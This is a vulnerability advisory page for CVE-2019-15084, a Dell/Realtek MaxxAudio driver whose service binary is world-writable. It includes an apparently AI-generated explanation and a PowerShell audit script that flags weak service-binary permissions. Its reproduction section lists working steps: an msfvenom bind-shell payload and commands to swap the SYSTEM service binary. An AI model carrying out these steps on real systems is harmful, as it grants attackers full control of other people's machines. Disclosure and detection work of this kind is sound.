CVE-2019-15084
Description
Realtek Waves MaxxAudio driver 1.6.2.0, as used on Dell laptops, installs with incorrect file permissions. As a result, a local attacker can escalate to SYSTEM.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- Realtek/Waves MaxxAudio driver
- Range: =1.6.2.0
Patches
Vulnerability mechanics
Root cause
"The installer sets incorrect file permissions granting `Everyone` full control over the service binary, allowing any local user to replace it."
Attack vector
A local attacker first verifies the weak permissions on `WavesSysSvc64.exe` using `icacls`, confirming that the `Everyone` group has full control (`F`) [ref_id=1]. Because the service runs as `LocalSystem`, replacing its binary with a malicious executable causes the service to execute the attacker's payload with SYSTEM privileges. The attacker moves the legitimate binary aside (since it is in use) and places a crafted `exe-service` payload (e.g., a bind shell generated with msfvenom) in its place [ref_id=1]. No authentication beyond local user access is required, and no special privileges are needed to exploit the weak file permission.
Affected code
The vulnerable binary is `C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe`, the executable for the `wavessyssvc` service which runs as `LocalSystem` [ref_id=1]. The service binary is installed with overly permissive ACLs, granting `Everyone:(I)(F)` (full control) to all users [ref_id=1].
What the fix does
No patch is provided in the bundle. The advisory states that "Dell PSIRT has acknowledged the issue and advises updating to a supported driver" [ref_id=1]. The fix would involve the vendor revising the installer to set restrictive file permissions on `WavesSysSvc64.exe`, removing the `Everyone:(F)` ACE so that only `SYSTEM` and `Administrators` can modify the binary, thereby preventing unprivileged users from replacing it.
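A defender-side check for the condition described above, as an added example that is not from the advisory or the vendor: it lists Windows service binaries whose ACL grants write-capable rights to broad groups such as `Everyone`. The function name `Find-WritableServiceBinary` and the selection of broad SIDs are assumptions of this example, and it goes beyond this one driver by covering every installed service.

```powershell
# Added example (not vendor code): flag service binaries that broad groups can modify.
function Find-WritableServiceBinary {
    param([string]$ServiceName = '*')   # e.g. 'wavessyssvc' for the service on this page

    # Well-known SIDs: Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE
    $broadSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'

    # Rights that allow replacing, deleting or re-permissioning the file,
    # plus the raw GENERIC_WRITE / GENERIC_ALL bits an ACE may carry.
    $rights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    $mask   = [int]$rights -bor 0x50000000

    Get-CimInstance Win32_Service | Where-Object { $_.Name -like $ServiceName } | ForEach-Object {
        $svc = $_
        # PathName may be quoted and may carry arguments; keep only the image path.
        if ($svc.PathName -match '^\s*"([^"]+)"' -or $svc.PathName -match '^\s*(.+?\.exe)') {
            $image = $Matches[1]
        } else { return }
        if (-not (Test-Path -LiteralPath $image -PathType Leaf)) { return }

        $acl = Get-Acl -LiteralPath $image
        # Ask for SIDs directly so the match does not depend on localized group names.
        $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $broadSids -contains $_.IdentityReference.Value -and
                ([int]$_.FileSystemRights -band $mask) -ne 0
            } |
            ForEach-Object {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Image     = $image
                    Principal = $_.IdentityReference.Value
                    Rights    = $_.FileSystemRights
                    Inherited = $_.IsInherited
                }
            }
    }
}

Find-WritableServiceBinary | Format-Table -AutoSize
```

The check covers the ACL on the binary itself; the ACL on its parent folder is not inspected and should be reviewed separately for any service that is flagged.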
Preconditions
- auth: Attacker must have local user access to the Windows system
- config: The `WavesSysSvc64.exe` file must be present with the weak ACL (Everyone: Full Control)
Reproduction
1. Verify weak permissions: `icacls "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"` — confirm `Everyone:(I)(F)` is present.
2. Generate a service payload: `msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe-service -o service.exe`.
3. Transfer the payload to the victim.
4. Move the legitimate binary: `move "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe" "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.bak"`.
5. Copy the malicious payload to the original path: `copy service.exe "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"`.
6. Restart the service or reboot; the payload runs as SYSTEM [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1. www.exploit-db.com/exploits/46416 (mitre, x_refsource_MISC)